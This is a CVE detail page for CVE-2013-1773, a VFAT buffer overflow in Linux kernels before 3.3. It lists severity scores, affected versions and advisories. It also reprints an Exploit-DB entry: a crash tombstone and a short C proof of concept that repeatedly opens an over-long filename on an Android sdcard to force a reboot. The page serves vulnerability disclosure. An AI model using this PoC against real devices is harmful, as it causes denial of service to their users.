CVE-2013-1773 : Detail

CVE-2013-1773

Overflow
0.07%V3
Local
2013-02-28
18h00 +00:00
2016-12-06
17h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Buffer overflow in the VFAT filesystem implementation in the Linux kernel before 3.3 allows local users to gain privileges or cause a denial of service (system crash) via a VFAT write operation on a filesystem with the utf8 mount option, which is not properly handled during UTF-8 to UTF-16 conversion.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Metrics

Metrics Score Severity CVSS Vector Source
V2 6.2 AV:L/AC:H/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 23248

Publication date : 2012-12-08
23h00 +00:00
Author : G13
EDB Verified : Yes

# Exploit Title: Android Kernel 2.6 Local DoS # Date: 12/7/12 # Author: G13 # Twitter: @g13net # Versions: Android 2.2, 2.3 # Category: DoS (android) # ##### Vulnerability ##### The Android OS is vulnerable to a local DoS when a filename with a length of 2048 or larger is attempted to be written to the sdcard(vfat fs) multiple times. The result of successful running of the exploit code is the system restarting. The vulnerability only effects Android kernels that are in the version 2.6 family. ##### Vendor Timeline ##### The Android Security Team has been contacted with updated PoC code and details. They have been aware of this vulnerability for over a year. ##### Tombstone ##### *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** Build fingerprint: 'verizon/SCH-I800/SCH-I800:2.3.4/GINGERBREAD/EF01:user/release-keys' pid: 349, tid: 363, name: SensorService >>> system_server <<< signal 8 (SIGFPE), code -6 (?), fault addr 0000015d r0 00000000 r1 00000008 r2 00000040 r3 00000000 r4 2a114310 r5 00000000 r6 51504690 r7 00000025 r8 2a114330 r9 2a114350 sl 00000003 fp 00000003 ip fffd4084 sp 51501eb0 lr 40039b70 pc 40037cf0 cpsr 20030010 d0 4271bc7bd0b80000 d1 0000000000000000 d2 0000000000000000 d3 427181eae9200000 d4 0000000000000000 d5 0000000000000000 d6 0000000000000000 d7 0000000000000000 d8 0000000000000000 d9 0000000000000000 d10 0000000000000000 d11 0000000000000000 d12 0000000000000000 d13 0000000000000000 d14 0000000000000000 d15 0000000000000000 d16 3fe99999a0000000 d17 3fe999999999999a d18 0033003200310030 d19 0000000000000000 d20 3fc554e7eb0eb47c d21 3e66376972bea4d0 d22 3f4de16b9c24a98f d23 3fb0f4a31edab38b d24 3fede16b9c24a98f d25 3fe55559ee5e69f9 d26 0000000000000000 d27 0000000000000000 d28 0000000000000005 d29 0000000000000000 d30 0000000000000000 d31 0000000000000000 scr 20000010 backtrace: #00 pc 0000dcf0 /system/lib/libc.so (kill+12) #01 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8) #02 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8) #03 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8) #04 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8) #05 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8) #06 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8) #07 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8) #08 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8) #09 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8) #10 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8) #11 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8) #12 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8) #13 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8) #14 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8) #15 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8) #16 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8) ##### PoC ##### #include <stdio.h> int main(int argc, char** argv) { char buf[5000]; int j,k; FILE *fp; /* Path to sdcard, typically /sdcard/ */ strcpy(buf,"/sdcard/"); for(k=0;k<=2048;k++){ strcat(buf,"A"); }; for(j=0;j<=50;j++){ fp=fopen(buf,"w"); }; return 0; }

Products Mentioned

Configuraton 0

Linux>>Linux_kernel >> Version To (including) 3.3

Linux>>Linux_kernel >> Version 3.0

Linux>>Linux_kernel >> Version 3.0

Linux>>Linux_kernel >> Version 3.0

Linux>>Linux_kernel >> Version 3.0

Linux>>Linux_kernel >> Version 3.0

Linux>>Linux_kernel >> Version 3.0

Linux>>Linux_kernel >> Version 3.0

Linux>>Linux_kernel >> Version 3.0.1

Linux>>Linux_kernel >> Version 3.0.2

Linux>>Linux_kernel >> Version 3.0.3

Linux>>Linux_kernel >> Version 3.0.4

Linux>>Linux_kernel >> Version 3.0.5

Linux>>Linux_kernel >> Version 3.0.6

Linux>>Linux_kernel >> Version 3.0.7

Linux>>Linux_kernel >> Version 3.0.8

Linux>>Linux_kernel >> Version 3.0.9

Linux>>Linux_kernel >> Version 3.0.10

Linux>>Linux_kernel >> Version 3.0.11

Linux>>Linux_kernel >> Version 3.0.12

Linux>>Linux_kernel >> Version 3.0.13

Linux>>Linux_kernel >> Version 3.0.14

Linux>>Linux_kernel >> Version 3.0.15

Linux>>Linux_kernel >> Version 3.0.16

Linux>>Linux_kernel >> Version 3.0.17

Linux>>Linux_kernel >> Version 3.0.18

Linux>>Linux_kernel >> Version 3.0.19

Linux>>Linux_kernel >> Version 3.0.20

Linux>>Linux_kernel >> Version 3.0.21

Linux>>Linux_kernel >> Version 3.0.22

Linux>>Linux_kernel >> Version 3.0.23

Linux>>Linux_kernel >> Version 3.0.24

Linux>>Linux_kernel >> Version 3.0.25

Linux>>Linux_kernel >> Version 3.0.26

Linux>>Linux_kernel >> Version 3.0.27

Linux>>Linux_kernel >> Version 3.0.28

Linux>>Linux_kernel >> Version 3.0.29

Linux>>Linux_kernel >> Version 3.0.30

Linux>>Linux_kernel >> Version 3.0.31

Linux>>Linux_kernel >> Version 3.0.32

Linux>>Linux_kernel >> Version 3.0.33

Linux>>Linux_kernel >> Version 3.0.34

Linux>>Linux_kernel >> Version 3.0.35

Linux>>Linux_kernel >> Version 3.0.36

Linux>>Linux_kernel >> Version 3.0.37

Linux>>Linux_kernel >> Version 3.0.38

Linux>>Linux_kernel >> Version 3.0.39

Linux>>Linux_kernel >> Version 3.0.40

Linux>>Linux_kernel >> Version 3.0.41

Linux>>Linux_kernel >> Version 3.0.42

Linux>>Linux_kernel >> Version 3.0.43

Linux>>Linux_kernel >> Version 3.0.44

Linux>>Linux_kernel >> Version 3.1

Linux>>Linux_kernel >> Version 3.1

Linux>>Linux_kernel >> Version 3.1

Linux>>Linux_kernel >> Version 3.1

Linux>>Linux_kernel >> Version 3.1

Linux>>Linux_kernel >> Version 3.1.1

Linux>>Linux_kernel >> Version 3.1.2

Linux>>Linux_kernel >> Version 3.1.3

Linux>>Linux_kernel >> Version 3.1.4

Linux>>Linux_kernel >> Version 3.1.5

Linux>>Linux_kernel >> Version 3.1.6

Linux>>Linux_kernel >> Version 3.1.7

Linux>>Linux_kernel >> Version 3.1.8

Linux>>Linux_kernel >> Version 3.1.9

Linux>>Linux_kernel >> Version 3.1.10

Linux>>Linux_kernel >> Version 3.2

Linux>>Linux_kernel >> Version 3.2

    Linux>>Linux_kernel >> Version 3.2

    Linux>>Linux_kernel >> Version 3.2

    Linux>>Linux_kernel >> Version 3.2

    Linux>>Linux_kernel >> Version 3.2

    Linux>>Linux_kernel >> Version 3.2

    Linux>>Linux_kernel >> Version 3.2

    Linux>>Linux_kernel >> Version 3.2.1

    Linux>>Linux_kernel >> Version 3.2.1

      Linux>>Linux_kernel >> Version 3.2.2

      Linux>>Linux_kernel >> Version 3.2.3

      Linux>>Linux_kernel >> Version 3.2.4

      Linux>>Linux_kernel >> Version 3.2.5

      Linux>>Linux_kernel >> Version 3.2.6

      Linux>>Linux_kernel >> Version 3.2.7

      Linux>>Linux_kernel >> Version 3.2.8

      Linux>>Linux_kernel >> Version 3.2.9

      Linux>>Linux_kernel >> Version 3.2.10

      Linux>>Linux_kernel >> Version 3.2.11

      Linux>>Linux_kernel >> Version 3.2.12

      Linux>>Linux_kernel >> Version 3.2.13

      Linux>>Linux_kernel >> Version 3.2.14

      Linux>>Linux_kernel >> Version 3.2.15

      Linux>>Linux_kernel >> Version 3.2.16

      Linux>>Linux_kernel >> Version 3.2.17

      Linux>>Linux_kernel >> Version 3.2.18

      Linux>>Linux_kernel >> Version 3.2.19

      Linux>>Linux_kernel >> Version 3.2.20

      Linux>>Linux_kernel >> Version 3.2.21

      Linux>>Linux_kernel >> Version 3.2.22

      Linux>>Linux_kernel >> Version 3.2.23

      Linux>>Linux_kernel >> Version 3.2.24

      Linux>>Linux_kernel >> Version 3.2.25

      Linux>>Linux_kernel >> Version 3.2.26

      Linux>>Linux_kernel >> Version 3.2.27

      Linux>>Linux_kernel >> Version 3.2.28

      Linux>>Linux_kernel >> Version 3.2.29

      Linux>>Linux_kernel >> Version 3.2.30

      Linux>>Linux_kernel >> Version 3.3

      Linux>>Linux_kernel >> Version 3.3

      Linux>>Linux_kernel >> Version 3.3

      Linux>>Linux_kernel >> Version 3.3

      Linux>>Linux_kernel >> Version 3.3

      Linux>>Linux_kernel >> Version 3.3

      Configuraton 0

      Redhat>>Enterprise_linux >> Version 6.0

      Redhat>>Enterprise_mrg >> Version 2.0

      References

      http://rhn.redhat.com/errata/RHSA-2013-0928.html
      Tags : vendor-advisory, x_refsource_REDHAT
      http://www.openwall.com/lists/oss-security/2013/02/26/8
      Tags : mailing-list, x_refsource_MLIST
      http://www.exploit-db.com/exploits/23248/
      Tags : exploit, x_refsource_EXPLOIT-DB
      http://rhn.redhat.com/errata/RHSA-2013-0744.html
      Tags : vendor-advisory, x_refsource_REDHAT
      http://www.securityfocus.com/bid/58200
      Tags : vdb-entry, x_refsource_BID
      http://www.osvdb.org/88310
      Tags : vdb-entry, x_refsource_OSVDB
      http://rhn.redhat.com/errata/RHSA-2013-1026.html
      Tags : vendor-advisory, x_refsource_REDHAT